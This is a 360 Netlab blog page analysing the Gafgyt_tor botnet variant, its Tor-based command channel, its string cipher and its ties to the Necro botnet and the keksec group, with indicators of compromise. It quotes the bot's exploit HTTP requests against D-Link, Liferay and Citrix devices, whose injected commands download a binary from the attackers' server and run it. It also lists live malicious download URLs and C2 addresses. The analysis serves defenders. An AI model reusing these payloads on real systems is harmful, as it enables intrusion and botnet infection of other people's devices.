<!DOCTYPE html>
<html lang="en">
<head>

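    <meta charset="utf-8">
    <!-- legacy document-mode hint for old Internet Explorer -->
    <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <title>Gafgtyt_tor and Necro are on the move again</title>
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="stylesheet" href="/assets/built/screen.css?v=db215a41fd">

    <link rel="shortcut icon" href="/favicon.png" type="image/png">
    <link rel="canonical" href="https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/">
    <!-- send the referrer on same-security requests, none on an HTTPS to HTTP downgrade -->
    <meta name="referrer" content="no-referrer-when-downgrade">
    <link rel="amphtml" href="https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/amp/">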
    
    <meta property="og:site_name" content="360 Netlab Blog - Network Security Research Lab at 360" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="Gafgtyt_tor and Necro are on the move again" />
    <meta property="og:description" content="Overview
Since February 15, 2021, 360Netlab&#x27;s BotMon system has continuously detected a
new variant of the Gafgyt family, which uses Tor for C2 communication to hide
the real C2 and encrypts sensitive strings in the samples. This is the first
time we found a Gafgyt variant using the Tor mechanism, so we named the variant
Gafgyt_tor. Further analysis revealed that the family is closely related to the 
Necro
[https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/] 
 fami" />
    <meta property="og:url" content="https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/" />
    <meta property="article:published_time" content="2021-03-04T14:00:00.000Z" />
    <meta property="article:modified_time" content="2021-03-04T13:59:59.000Z" />
    <meta property="article:tag" content="Necro" />
    <meta property="article:tag" content="Necromporph" />
    <meta property="article:tag" content="Freakout" />
    <meta property="article:tag" content="gafgyt_tor" />
    <meta property="article:tag" content="Tor" />
    <meta property="article:tag" content="DDoS" />
    <meta property="article:tag" content="gafgyt" />
    <meta property="article:tag" content="Tsunami" />
    <meta property="article:tag" content="keksec" />
    <meta property="article:tag" content="Botnet" />
    <meta property="article:tag" content="CVE-2019-16920" />
    <meta property="article:tag" content="CVE-2019-19781" />
    <meta property="article:tag" content="ak47scan" />
    
    <meta name="twitter:card" content="summary" />
    <meta name="twitter:title" content="Gafgtyt_tor and Necro are on the move again" />
    <meta name="twitter:description" content="Overview
Since February 15, 2021, 360Netlab&#x27;s BotMon system has continuously detected a
new variant of the Gafgyt family, which uses Tor for C2 communication to hide
the real C2 and encrypts sensitive strings in the samples. This is the first
time we found a Gafgyt variant using the Tor mechanism, so we named the variant
Gafgyt_tor. Further analysis revealed that the family is closely related to the 
Necro
[https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/] 
 fami" />
    <meta name="twitter:url" content="https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/" />
    <meta name="twitter:label1" content="Written by" />
    <meta name="twitter:data1" content="jinye" />
    <meta name="twitter:label2" content="Filed under" />
    <meta name="twitter:data2" content="Necro, Necromporph, Freakout, gafgyt_tor, Tor, DDoS, gafgyt, Tsunami, keksec, Botnet, CVE-2019-16920, CVE-2019-19781, ak47scan" />
    <meta name="twitter:site" content="@360Netlab" />
    <meta name="twitter:creator" content="@SethKingHi" />
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "360 Netlab Blog - Network Security Research Lab at 360",
        "logo": "https://blog.netlab.360.com/content/images/2019/02/netlab-brand-5.png"
    },
    "author": {
        "@type": "Person",
        "name": "jinye",
        "image": {
            "@type": "ImageObject",
            "url": "https://blog.netlab.360.com/content/images/2019/12/400--2-.jpeg",
            "width": 400,
            "height": 400
        },
        "url": "https://blog.netlab.360.com/author/jinye/",
        "sameAs": [
            "https://twitter.com/SethKingHi"
        ]
    },
    "headline": "Gafgtyt_tor and Necro are on the move again",
    "url": "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
    "datePublished": "2021-03-04T14:00:00.000Z",
    "dateModified": "2021-03-04T13:59:59.000Z",
    "keywords": "Necro, Necromporph, Freakout, gafgyt_tor, Tor, DDoS, gafgyt, Tsunami, keksec, Botnet, CVE-2019-16920, CVE-2019-19781, ak47scan",
    "description": "Overview\nSince February 15, 2021, 360Netlab&#x27;s BotMon system has continuously detected a\nnew variant of the Gafgyt family, which uses Tor for C2 communication to hide\nthe real C2 and encrypts sensitive strings in the samples. This is the first\ntime we found a Gafgyt variant using the Tor mechanism, so we named the variant\nGafgyt_tor. Further analysis revealed that the family is closely related to the \nNecro\n[https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/] \n fami",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://blog.netlab.360.com/"
    }
}
    </script>

    <script src="/public/ghost-sdk.min.js?v=db215a41fd"></script>
<script>
ghost.init({
	clientId: "ghost-frontend",
	clientSecret: "2a7213b591a9"
});
</script>
    <meta name="generator" content="Ghost 2.13" />
    <link rel="alternate" type="application/rss+xml" title="360 Netlab Blog - Network Security Research Lab at 360" href="https://blog.netlab.360.com/rss/" />
    

<!-- Fix first paragraph font size -->
<style type="text/css">
 .post-template .post-content > p:first-child {font-size: 1em;}
</style>

</head>
<body class="post-template tag-necro tag-necromporph tag-freakout tag-gafgyt_tor tag-tor tag-ddos tag-gafgyt tag-tsunami tag-keksec tag-botnet tag-cve-2019-16920 tag-cve-2019-19781 tag-ak47scan">

    <div class="site-wrapper">



    <main id="site-main" class="site-main outer">
        <div class="inner">

            <article class="post-full post tag-necro tag-necromporph tag-freakout tag-gafgyt_tor tag-tor tag-ddos tag-gafgyt tag-tsunami tag-keksec tag-botnet tag-cve-2019-16920 tag-cve-2019-19781 tag-ak47scan no-image">

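                <header class="post-full-header">
                    <div class="post-full-meta">
                        <time class="post-full-meta-date" datetime="2021-03-04">4 March 2021</time>
                        <span class="date-divider">/</span> <a href="/tag/necro/">Necro</a>
                    </div>
                    <h1 class="post-full-title">Gafgtyt_tor and Necro are on the move again</h1>
                </header>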


                <section class="post-full-content">
                    <div class="post-content">
                        <h2 id="overview">Overview</h2>
<p>Since February 15, 2021, 360Netlab's BotMon system has continuously detected a new variant of the Gafgyt family, which uses Tor for C2 communication to hide the real C2 and encrypts sensitive strings in the samples. This is the first time we have found a Gafgyt variant using the Tor mechanism, so we named the variant Gafgyt_tor. Further analysis revealed that the family is closely related to the <a href="https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/">Necro</a> family we made public in January, and is run by the same group of people, the so-called keksec group <a href="https://mp.weixin.qq.com/s/D30y0qeicKnHmP9Kad-pmg">[1]</a> <a href="https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/">[2]</a>. In this blog, we will introduce Gafgyt_tor and summarize other recent botnets operated by this group.</p>
<p>The key points of this article are as follows.</p>
<ol>
<li>
<p>Gafgyt_tor uses Tor to hide C2 communication; over 100 Tor proxies are built in, and new samples continuously update the proxy list.</p>
</li>
<li>
<p>Gafgyt_tor shares the same origin as the Gafgyt samples distributed by the keksec group; the core function is still DDoS attacks and scanning.</p>
</li>
<li>
<p>The keksec group reuses code between different bot families.</p>
</li>
<li>
<p>In addition, the keksec group has also reused a set of IP addresses for a long time.</p>
</li>
</ol>
<h2 id="sampleanalysis">Sample Analysis</h2>
<h3 id="propagation">Propagation</h3>
<p>The currently discovered Gafgyt_tor botnet is mainly propagated through Telnet weak passwords and the following three vulnerabilities.</p>
<ul>
<li>D-Link RCE (CVE-2019-16920)</li>
</ul>
<pre><code>POST /apply_sec.cgi HTTP/1.1
Host: %s:%d
User-Agent: kpin
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: close
Referer: http://%s:%d/login_pic.asp
Cookie: uid=1234123
Upgrade-Insecure-Requests: 1

html_response_page=login_pic.asp&amp;action=ping_test&amp;ping_ipaddr=127.0.0.1%%0acd%%20%%2Ftmp;busybox%%20wget%%20http%%3A%%2F%%2F%s%%2Fbins%%2FAJhkewbfwefWEFarm7%%20%7C%7C%%20wget%%20http%%3A%%2F%%2F%s%%2Fbins%%2FAJhkewbfwefWEFarm7%%20-O%%20.kpin;chmod%%20777%%20.%%2F.kpin;.%2F.kpin;rm%%20-rf%%20.kpin
</code></pre>
<ul>
<li>Liferay Portal RCE</li>
</ul>
<pre><code>POST /api/jsonws/expandocolumn/update-column HTTP/1.1
Host: %s:%d
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.0
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: Basic dGVzdEBsaWZlcmF5LmNvbTp0ZXN0

%2BdefaultData=com.mchange.v2.c3p0.WrapperConnectionPoolDataSource&amp;defaultData.userOverridesAsString=HexAsciiSerializedMap:...
</code></pre>
<ul>
<li>Citrix CVE-2019-19781</li>
</ul>
<pre><code> POST /vpns/portal/scripts/newbm.pl HTTP/1.1
 Host: %s:%d
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
 Accept-Encoding: gzip, deflate
 Accept: */*
 Connection: keep-alive
 NSC_USER: ../../../netscaler/portal/templates/flialwznxz
 NSC_NONCE: 12
 Content-Length: %d
 Content-Type: application/x-www-form-urlencoded
 
 url=127.0.0.1&amp;title=%%5B%%25+template.new%%28%%7B%%27BLOCK%%27%%3D%%27print+readpipe%%28%%22cd+%%2Ftmp%%3Bwget+http%%3A%%2F%%2F%s%%2Fbins%%2FAJhkewbfwefWEFx86+%%7C%%7C+wget+http%%3A%%2F%%2F%s%%2Fbins%%2FAJhkewbfwefWEFx86+-O+.kpin%%3Bchmod+777+.%%2F.kpin%%3B.%%2F.kpin%%3Brm+-rf+.kpin%%22%%29%%27%%7D%%29%%25%%5D&amp;desc=desc&amp;UI_inuse=a 
</code></pre>
<h3 id="encryption">Encryption</h3>
<p>Gafgyt_tor integrates a substitution-cipher encryption algorithm for encrypting the C2 and sensitive strings to counter detection and static analysis. Sensitive strings include commands, IPC pathnames, DDoS-related attack strings, etc.</p>
<p>The following is a comparison of ciphertext and plaintext C2.</p>
<pre><code># ciphertext
'&quot;?&gt;K!tF&gt;iorZ:ww_uBw3Bw' 

# plaintext
'wvp3te7pkfczmnnl.onion'
</code></pre>
<p>The Gafgyt_tor variants we detected so far all use the same C2 wvp3te7pkfczmnnl.onion.</p>
<p>Some of the cipher decryption results are as follows.</p>
<pre><code># commands
~-6mvgmv    -    LDSERVER
1-|         -         UDP
cD|         -         TCP
ej~-        -        HOLD
51,U        -        JUNK
c~6         -         TLS
6c-         -         STD
-,6         -         DNS
6D7,,mv     -     SCANNER
j,          -          ON
jdd         -         OFF
jge         -         OVH
.~7DU,1v6m  -  BLACKNURSE

# DDoS-related attack
7~~         -         ALL
6p,         -         SYN
v6c         -         RST
dx,         -         FIN
7DU         -         ACK
|6e         -         PSH

# Scan-related
aDbwwtr3bw  -  WChnnecihn
aQuq        -         W.1
aEcc        -        WxTT
74tw!       -       Agent
1;t=        -        User

# misc
|x,&lt;        -        PING
=ru_Brf_    -    rc.local
</code></pre>
<p>The following is the Python decryption code we wrote based on the reverse-engineering results.</p>
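<pre><code>def decode(encoded, encodes):
    """Reverse the sample's byte-substitution cipher.

    encoded: ciphertext bytes taken from the sample.
    encodes: the 64-byte substitution table recovered from the sample;
             position i of this table maps to position i of `decodes`.
    Bytes that do not occur in the table are skipped.
    Prints and returns the decoded bytes.
    """
    decodes = b'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. '
    decoded = bytearray()

    for byte in encoded:
        # linear scan of the table; only the first 64 entries are used
        for table_idx in range(64):
            if byte == encodes[table_idx]:
                decoded.append(decodes[table_idx])

    print(decoded)
    return decoded

encodes = b'%q*KC)&amp;F98fsr2to4b3yi_:wB&gt;z=;!k?&quot;EAZ7.D-md&lt;ex5U~h,j|$v6c1ga+p@un'
encoded_cc = b'&quot;?&gt;K!tF&gt;iorZ:ww_uBw3Bw'
decode(encoded_cc, encodes)
</code></pre>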
<h3 id="communication">Communication</h3>
<p>Compared with other Gafgyt variants, the biggest change in Gafgyt_tor is that the C2 communication is based on Tor, which increases the difficulty of detection and blocking. The Tor-based C2 communication mechanism has been seen in other families we have analyzed before (<a href="https://blog.netlab.360.com/matryosh-botnet-is-spreading/">Matryosh</a> <a href="https://blog.netlab.360.com/the-leethozer-botnet/">leethozer</a> <a href="https://blog.netlab.360.com/moobot-0day-unixcctv-dvr/">moobot</a>), but this is the first time we have encountered it in the Gafgyt family.</p>
<ul>
<li>Code changes</li>
</ul>
<p>Compared with other versions, the code structure of the main function of Gafgyt_tor, which adds the Tor proxy functionality, has changed substantially, as shown in the following figure.</p>
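<figure class="kg-card kg-image-card"><img class="kg-image" src="https://blog.netlab.360.com/content/images/2021/03/ver1_ver2_cmp_cfg.en.png" alt="Comparison of the main function code structure between an earlier Gafgyt version and Gafgyt_tor" loading="lazy"></figure><p>The original initConnection() function, which is responsible for establishing the C2 connection, is gone, replaced by a large section of code responsible for establishing the Tor connection. The newly added Tor-related functions are as follows.</p>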
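<figure class="kg-card kg-image-card"><img class="kg-image" src="https://blog.netlab.360.com/content/images/2021/03/tor_functions.png" alt="List of the Tor-related functions newly added in Gafgyt_tor" loading="lazy"></figure><p>Among them, tor_socket_init is responsible for initializing a list of proxy nodes, each containing an ip address and a port.</p>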
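<figure class="kg-card kg-image-card"><img class="kg-image" src="https://blog.netlab.360.com/content/images/2021/03/tor_socket_init.png" alt="tor_socket_init initializing the list of proxy nodes, each with an IP address and a port" loading="lazy"></figure><p>Our analysis shows that the number of proxy nodes integrated in each sample is always 100+, with a maximum of 173.</p>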
<p>After initializing the proxy list, the sample will select a random node from the list to enable Tor communication via tor_retrieve_addr and tor_retrieve_port.</p>
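<figure class="kg-card kg-image-card"><img class="kg-image" src="https://blog.netlab.360.com/content/images/2021/03/random_select_tor_node.png" alt="Random selection of a Tor proxy node via tor_retrieve_addr and tor_retrieve_port" loading="lazy"></figure><p>After establishing a connection with the Tor proxy, Gafgyt_tor starts requesting wvp3te7pkfczmnnl.onion through the darknet waiting for instructions. This C2 address has not changed in the samples we have analyzed, but the communication port is continuously changing.</p>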
<ul>
<li>The command</li>
</ul>
<p>The core function of Gafgyt_tor is still DDoS attacks and scanning, so it mostly follows the common Gafgyt directives; a new directive called LDSERVER has been added. Through this directive, the C2 can specify the download server used in Gafgyt_tor's exploits, as shown in the figure below.</p>
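<figure class="kg-card kg-image-card"><img class="kg-image" src="https://blog.netlab.360.com/content/images/2021/03/dyn_config_scan_payload_dl_server-1.png" alt="LDSERVER directive setting the download server used by the exploit payload" loading="lazy"></figure><p>This directive means that C2 can dynamically switch download servers, so that it can quickly switch to a new download server to continue propagation if the current one is blocked.</p>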
<h3 id="someotherthings">Some other things</h3>
<p>Gafgyt_tor uses a few uncommon coding tricks in addition to the modification of the communication function.</p>
<ul>
<li>Singleton mode</li>
</ul>
<p>Singleton mode is implemented using a Unix domain socket (an IPC mechanism), which requires a pathname to be specified; this pathname is also encrypted. As shown below, k4=f2t decrypts to ugrade.</p>
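<figure class="kg-card kg-image-card"><img class="kg-image" src="https://blog.netlab.360.com/content/images/2021/03/singleton_connect-2.png" alt="Singleton check connecting to a Unix domain socket whose encrypted pathname k4=f2t decrypts to ugrade" loading="lazy"></figure><ul>
<li>Function name obfuscation</li>
</ul>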
<p>None of the Gafgyt_tor samples we collected have been stripped, so the complete symbol information is preserved in the samples, and most of the samples scan and propagate using a function named ak47Scan. In the sample captured on February 24 we found that the function name was obfuscated as a random string, so it can be assumed that the sample is in an active development stage and the authors are gradually strengthening Gafgyt_tor's ability to counter analysis and detection.</p>
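<figure class="kg-card kg-image-card"><img class="kg-image" src="https://blog.netlab.360.com/content/images/2021/03/ak47scan_v2_comp_v2.1_obf.en.png" alt="Comparison of the ak47Scan function with the later sample in which its name is obfuscated as a random string" loading="lazy"></figure><h2 id="sampleorigin">Sample origin</h2>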
<p>While analyzing the IoCs of Gafgyt_tor, we noticed that the download server IP 45.145.185.83 was used by the Necro botnet, which appeared in early January this year:</p>
<p>gxbrowser.net is one of Necro's 3 C2s, and the above image shows that it has resolved to this download server IP of Gafgyt_tor several times.</p>
<p>Further analysis shows that this IP and another Necro C2 IP, 193.239.147.224, were also used as C2s by other versions of the Gafgyt and Tsunami botnets in early February, which apparently share code with Gafgyt_tor.</p>
<ol>
<li>
<p>Both have decryption functions named decode, with identical code structures.</p>
</li>
<li>
<p>Both have scan functions named ak47scan and ak47telscan.</p>
</li>
</ol>
<p>Their decode function decode() differs only in the code table.</p>
<pre><code># Code table in the gafgyt sample
'%q*KC)&amp;F98fsr2to4b3yi_:wB&gt;z=;!k?&quot;EAZ7.D-md&lt;ex5U~h,j|$v6c1ga+p@un0'

# Code table in tsunami sample
'xm@_;w,B-Z*j?nvE|sq1o$3&quot;7zKC&lt;F)utAr.p%=&gt;4ihgfe6cba~&amp;5Dk2d!8+9Uy:0'
</code></pre>
<p>The following figure is a comparison of their ak47scan() functions; you can see that the functionality and structure are actually similar, but there are changes in the way it runs and the ports it scans.</p>
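<figure class="kg-card kg-image-card"><img class="kg-image" src="https://blog.netlab.360.com/content/images/2021/03/ak47scan_history.png" alt="Comparison of the ak47scan() functions in the Gafgyt and Tsunami samples" loading="lazy"></figure><p>Based on the binary characteristics of the decode() and ak47scan() functions mentioned above, we found more such Tsunami and Gafgyt samples in our sample database, which are characterized as follows.</p>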
<ol>
<li>
<p>Tsunami samples appear in mid-August 2020 and are active for a short period of time.</p>
</li>
<li>
<p>Gafgyt samples were spreading intermittently from September to December 2020.</p>
</li>
<li>
<p>From early to mid-February, first Tsunami samples resumed propagation, then Gafgyt, followed by Gafgyt_tor.</p>
</li>
<li>
<p>There are many similarities between the currently spreading Gafgyt_tor variants and the previously captured Gafgyt samples, and the code clearly shares the same origin.</p>
</li>
<li>
<p>These botnet variants frequently reuse the same download server and C2 IP addresses.</p>
</li>
</ol>
<p>We can see that there was no update in January this year; we guess this is because the authors focused their efforts on Necro. In terms of binary characteristics, there is no similarity with Gafgyt_tor as Necro is written in Python, but we see there are some commonalities in propagation methods.</p>
<ol>
<li>
<p>Both changed different exploits in a short period of time, presumably to improve the propagation effect.</p>
</li>
<li>
<p>Both adopted the &quot;develop-and-distribute&quot; approach to continuously improve the botnet function, resulting in a large number of different samples being distributed in a short period of time.</p>
</li>
</ol>
<p>Based on the above analysis, we think that Gafgyt_tor and Necro are very likely operated by the same group of people, who have a pool of IP addresses and multiple botnet source codes, and are capable of continuous development. In actual operation, they form different families of botnets but reuse infrastructure such as IP addresses; for example, the above-mentioned IP address 45.145.185.83 has acted as a C2 for different botnets since the end of last year, and the timeline of its different functions is roughly shown in the figure below.</p>
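<figure class="kg-card kg-image-card"><img class="kg-image" src="https://blog.netlab.360.com/content/images/2021/03/ip_timeline-3.png" alt="Timeline of the roles of IP 45.145.185.83 across the group's botnets since the end of 2020" loading="lazy"></figure><p>Here are some conclusions about the group:</p>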
<ol>
<li>
<p>They have at least the source code for Necro, Gafgyt and Tsunami.</p>
</li>
<li>
<p>They continue to upgrade and rotate the botnets in their hands.</p>
</li>
<li>
<p>They have a pool of IP address resources and reuse them in different botnets.</p>
</li>
<li>
<p>The group also keeps up with n-day vulnerabilities in IoT devices and uses them promptly to expand its own botnets.</p>
</li>
</ol>
<p>The timeline chart below shows the Linux IoT botnet family operated by this group that we detected from last August to now.</p>
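<figure class="kg-card kg-image-card"><img class="kg-image" src="https://blog.netlab.360.com/content/images/2021/03/keksec_samples_timeline-2.png" alt="Timeline of the Linux IoT botnet families operated by this group since August 2020" loading="lazy"></figure><h2 id="contactus">Contact us</h2>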
<p>Readers are always welcome to reach us on Twitter, or by email at netlab at 360 dot cn.</p>
<h2 id="ioc">IoC</h2>
<ul>
<li>MD5</li>
</ul>
<pre><code># tsunami
3ab32e92917070942135f5c5a545127d

# gafgyt
f1d6fbd0b4e6c6176e7e89f1d1784d14

# gafgyt_tor
eb77fa43bb857e68dd1f7fab04ed0de4
dce3d16ea9672efe528f74949403dc93
bfaa01127e03a119d74bdb4cb0f557ec
a6bdf72b8011be1edc69c9df90b5e0f2
5c1153608be582c28e3287522d76c02f
54e2687070de214973bdc3bc975049b5
b40d8a44b011b79178180a657b052527
1cc68eb2d9713925d692194bd0523783
94a587198b464fc4f73a29c8d8d6e420
2b2940d168a60990377fea8b6158ba22
56439912093d9c1bf08e34d743961763
2d6917fe413163a7be7936a0609a0c2d
8cd99b32ec514f348f4273a814f97e79
1c966d79319e68ccc66f1a2231040adb
47275afdb412321610c08576890093d7
3c5758723980e6b9315ac6e6c32e261d
980d4d0ac9335ae1db6938e8aeb3e757
513bc0091dfa208249bd1e6a66d9d79e
8e551c76a6b17299da795c2b69bb6805
61b93c03cb5af31b82c11d0c86f82be1
69cab222e42c7177655f490d849e18c5
7cbdd215e7f1e17fc589de2df3f09ac9
6b631fed1416c2cd16ca01738fdfe61a
90a716280fe1baee0f056a79c3aa724d
3b4f844c7dd870e8b8c1d5a397a29514
853dc777c5959db7056f64b34e938ba5
3eccab18fa690bbfdb6e10348bc40b02
e78e04aad0915f2febcbb19ef6ffc4fe
b99115a6ea41d85dea5c96d799e65353
4b95dfc5dc523f29eebf7d50e98187c2
4c271f8068bc64686b241eb002e15459
843a7fec9a8e2398a69dd7dfc49afdd2
7122bcd084d2d0e721ec7c01cf2a6a57
10f6b09f88e0cf589d69a764ff4f455b
f91083e19eed003ac400c1e94eba395e
</code></pre>
<ul>
<li>C2</li>
</ul>
<pre><code>wvp3te7pkfczmnnl.onion
</code></pre>
<ul>
<li>Download URL</li>
</ul>
<pre><code>http://45.153.203.124/bins/AJhkewbfwefWEFx86
http://45.153.203.124/bins/AJhkewbfwefWEFsh4
http://45.153.203.124/bins/AJhkewbfwefWEFmips

http://45.153.203.124/S1eJ3/lPxdChtp3zx86
http://45.153.203.124/S1eJ3/lPxdChtp3zsh4
http://45.153.203.124/S1eJ3/lPxdChtp3zppc-440fp
http://45.153.203.124/S1eJ3/lPxdChtp3zmpsl
http://45.153.203.124/S1eJ3/lPxdChtp3zmips
http://45.153.203.124/S1eJ3/lPxdChtp3zarm7
http://45.153.203.124/S1eJ3/lPxdChtp3zarm

http://45.145.185.83/bins/AJhkewbfwefWEFx86
http://45.145.185.83/bins/AJhkewbfwefWEFspc
http://45.145.185.83/bins/AJhkewbfwefWEFsh4
http://45.145.185.83/bins/AJhkewbfwefWEFppc
http://45.145.185.83/bins/AJhkewbfwefWEFmips
http://45.145.185.83/bins/AJhkewbfwefWEFi586
http://45.145.185.83/bins/AJhkewbfwefWEFarm7
http://45.145.185.83/bins/AJhkewbfwefWEFarm

http://45.145.185.83/S1eJ3/lPxdChtp3zsh4
http://45.145.185.83/S1eJ3/lPxdChtp3zmpsl
http://45.145.185.83/S1eJ3/lPxdChtp3zmips
http://45.145.185.83/S1eJ3/lPxdChtp3zi686
http://45.145.185.83/S1eJ3/lPxdChtp3zbsd
http://45.145.185.83/S1eJ3/lPxdChtp3zarm7
http://45.145.185.83/S1eJ3/lPxdChtp3zarm64
http://45.145.185.83/S1eJ3/lPxdChtp3zarm

http://45.145.185.83/S1eJ3/IObeENwjx86
http://45.145.185.83/S1eJ3/IObeENwjmips
http://45.145.185.83/S1eJ3/IObeENwjarm5
http://45.145.185.83/S1eJ3/IObeENwjarm4
http://45.145.185.83/S1eJ3/IObeENwjarm
</code></pre>
<ul>
<li>Tor Proxy</li>
</ul>
<pre><code>103.125.218.111
103.125.218.111
103.82.219.42
104.155.207.91
104.224.179.229
107.20.204.32
111.90.159.138
116.202.107.151
116.203.210.124
116.203.210.124
116.203.210.124
116.203.210.124
116.203.210.124
119.28.149.37
128.199.45.26
130.193.56.117
134.122.4.130
134.122.4.130
134.122.59.236
134.122.59.236
134.122.59.236
134.209.230.13
134.209.249.97
135.181.137.237
138.68.6.227
139.162.149.58
139.162.32.82
139.162.42.124
139.99.239.154
142.47.219.133
143.110.230.187
145.239.83.129
146.59.156.72
146.59.156.76
146.59.156.77
146.66.180.176
148.251.177.144
157.230.27.96
157.230.98.211
157.230.98.77
158.174.108.130
158.174.108.130
158.174.108.130
158.174.108.130
158.174.108.130
158.174.108.130
158.174.108.130
158.247.211.132
159.65.69.186
159.69.203.65
159.69.203.65
159.89.19.9
161.35.84.202
165.22.194.250
165.22.94.245
167.172.123.221
167.172.173.3
167.172.177.33
167.172.178.215
167.172.179.199
167.172.180.219
167.172.190.42
167.233.6.47
167.71.236.109
168.119.37.152
168.119.37.152
168.119.37.152
168.119.37.152
168.119.37.152
168.119.61.251
172.104.240.74
172.104.4.144
176.37.245.132
178.62.215.4
18.191.18.101
18.229.49.115
185.105.237.253
185.106.121.176
185.106.122.10
185.128.139.56
185.180.223.198
185.18.215.170
185.18.215.178
185.212.128.115
185.212.128.115
185.212.128.115
185.212.128.115
185.212.128.115
185.212.128.115
185.217.1.30
188.127.231.152
188.165.233.121
188.166.17.35
188.166.34.137
188.166.79.209
188.166.79.209
188.166.80.74
188.166.82.232
188.166.82.232
188.227.224.110
188.68.52.220
192.46.209.98
192.99.169.229
193.123.35.48
193.187.173.33
195.123.222.9
195.93.173.53
197.156.89.19
198.27.82.186
198.74.54.182
199.247.4.110
201.40.122.152
20.52.130.140
20.52.130.140
20.52.130.140
20.52.147.137
20.52.37.89
20.52.37.89
206.81.17.232
206.81.27.29
212.71.253.168
212.8.244.112
217.12.201.190
217.12.201.190
217.12.201.190
217.144.173.78
217.170.127.226
217.61.98.33
34.239.11.167
35.189.88.51
35.192.111.58
35.192.111.58
37.200.66.166
3.91.139.103
45.33.45.209
45.33.79.19
45.33.82.126
45.79.207.110
45.81.225.67
45.81.225.67
45.81.226.8
45.81.226.8
45.81.226.8
45.92.94.83
46.101.156.38
46.101.159.138
47.90.1.153
49.147.80.102
50.116.61.125
5.100.80.141
51.11.240.222
51.11.240.222
51.116.185.181
51.116.185.181
51.195.201.47
51.195.201.50
5.167.53.191
51.68.191.153
51.75.161.21
51.83.185.71
51.83.186.137
51.89.165.233
52.47.87.178
5.63.13.54
66.42.34.110
67.205.130.65
68.183.67.182
68.183.82.50
79.124.62.26
80.251.220.190
8.210.163.246
8.210.163.246
87.236.215.248
88.198.167.20
88.198.167.20
91.236.251.131
94.23.40.220
95.179.163.1
95.179.163.1
95.179.163.1
95.179.163.1
95.179.164.28
95.179.164.28
95.179.164.28
95.188.93.135
95.216.123.39
95.216.137.149
95.217.27.5
</code></pre>
<h2 id="references">References</h2>
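<ul>
<li><a href="https://blog.netlab.360.com/necro/">https://blog.netlab.360.com/necro/</a></li>
<li><a href="https://mp.weixin.qq.com/s/D30y0qeicKnHmP9Kad-pmg">https://mp.weixin.qq.com/s/D30y0qeicKnHmP9Kad-pmg</a></li>
<li><a href="https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/">https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/</a></li>
</ul>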
                    </div>
                </section>


                <footer class="post-full-footer">


                    


                </footer>


            </article>

        </div>
    </main>







    </div>


    <script>
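        // Gallery layout (Ghost "kg-gallery" cards): give each image wrapper a
        // flex-grow equal to its image's aspect ratio so the images in one row
        // share a common height. Runs once, synchronously, at page load.
        var images = document.querySelectorAll('.kg-gallery-image img');
        images.forEach(function (image) {
            var container = image.closest('.kg-gallery-image');
            // Read the intrinsic width/height attributes defensively: the
            // original `image.attributes.width.value` throws when either
            // attribute is absent, aborting the layout for every later image.
            var width = parseFloat(image.getAttribute('width'));
            var height = parseFloat(image.getAttribute('height'));
            if (!container || !(width > 0) || !(height > 0)) {
                return;
            }
            container.style.flex = (width / height) + ' 1 0%';
        });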
    </script>


    <!-- jQuery is fetched from the public CDN with Subresource Integrity and
         crossorigin="anonymous", so the browser refuses a substituted or
         tampered file; the hash must be regenerated whenever the version
         changes.
         NOTE(review): 3.2.1 is an old release; later 3.4/3.5 releases carry
         security fixes (prototype pollution in $.extend, htmlPrefilter-based
         XSS). Consider upgrading and refreshing the integrity attribute. -->
    <script
        src="https://code.jquery.com/jquery-3.2.1.min.js"
        integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4="
        crossorigin="anonymous">
    </script>
    <!-- Same-origin theme asset with a cache-busting version query; no SRI is
         needed for first-party scripts, but it does depend on jQuery above. -->
    <script type="text/javascript" src="/assets/built/jquery.fitvids.js?v=db215a41fd"></script>


        <script>

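        // NOTE: Scroll performance is poor in Safari
        // - this appears to be due to the events firing much more slowly in Safari.
        //   Dropping the scroll event and using only a raf loop results in smoother
        //   scrolling but continuous processing even when not scrolling
        //
        // Post-page behaviour: fluid video embeds (fitVids), the floating
        // header that appears once the reader scrolls past the post title,
        // and the <progress id="reading-progress"> bar. Scroll and resize
        // events are coalesced into one requestAnimationFrame tick via the
        // `ticking` flag so update() runs at most once per frame.
        $(document).ready(function () {
            // Start fitVids
            var $postContent = $(".post-full-content");
            $postContent.fitVids();
            // End fitVids

            var progressBar = document.querySelector('#reading-progress');
            var header = document.querySelector('.floating-header');
            var title = document.querySelector('.post-full-title');

            // All three come from the theme template. Bail out instead of
            // throwing in update() on every scroll if this script is ever
            // included on a page that lacks one of them.
            if (!progressBar || !header || !title) {
                return;
            }

            // Cached by the event handlers so update() itself does as little
            // layout reading as possible.
            var lastScrollY = window.scrollY;
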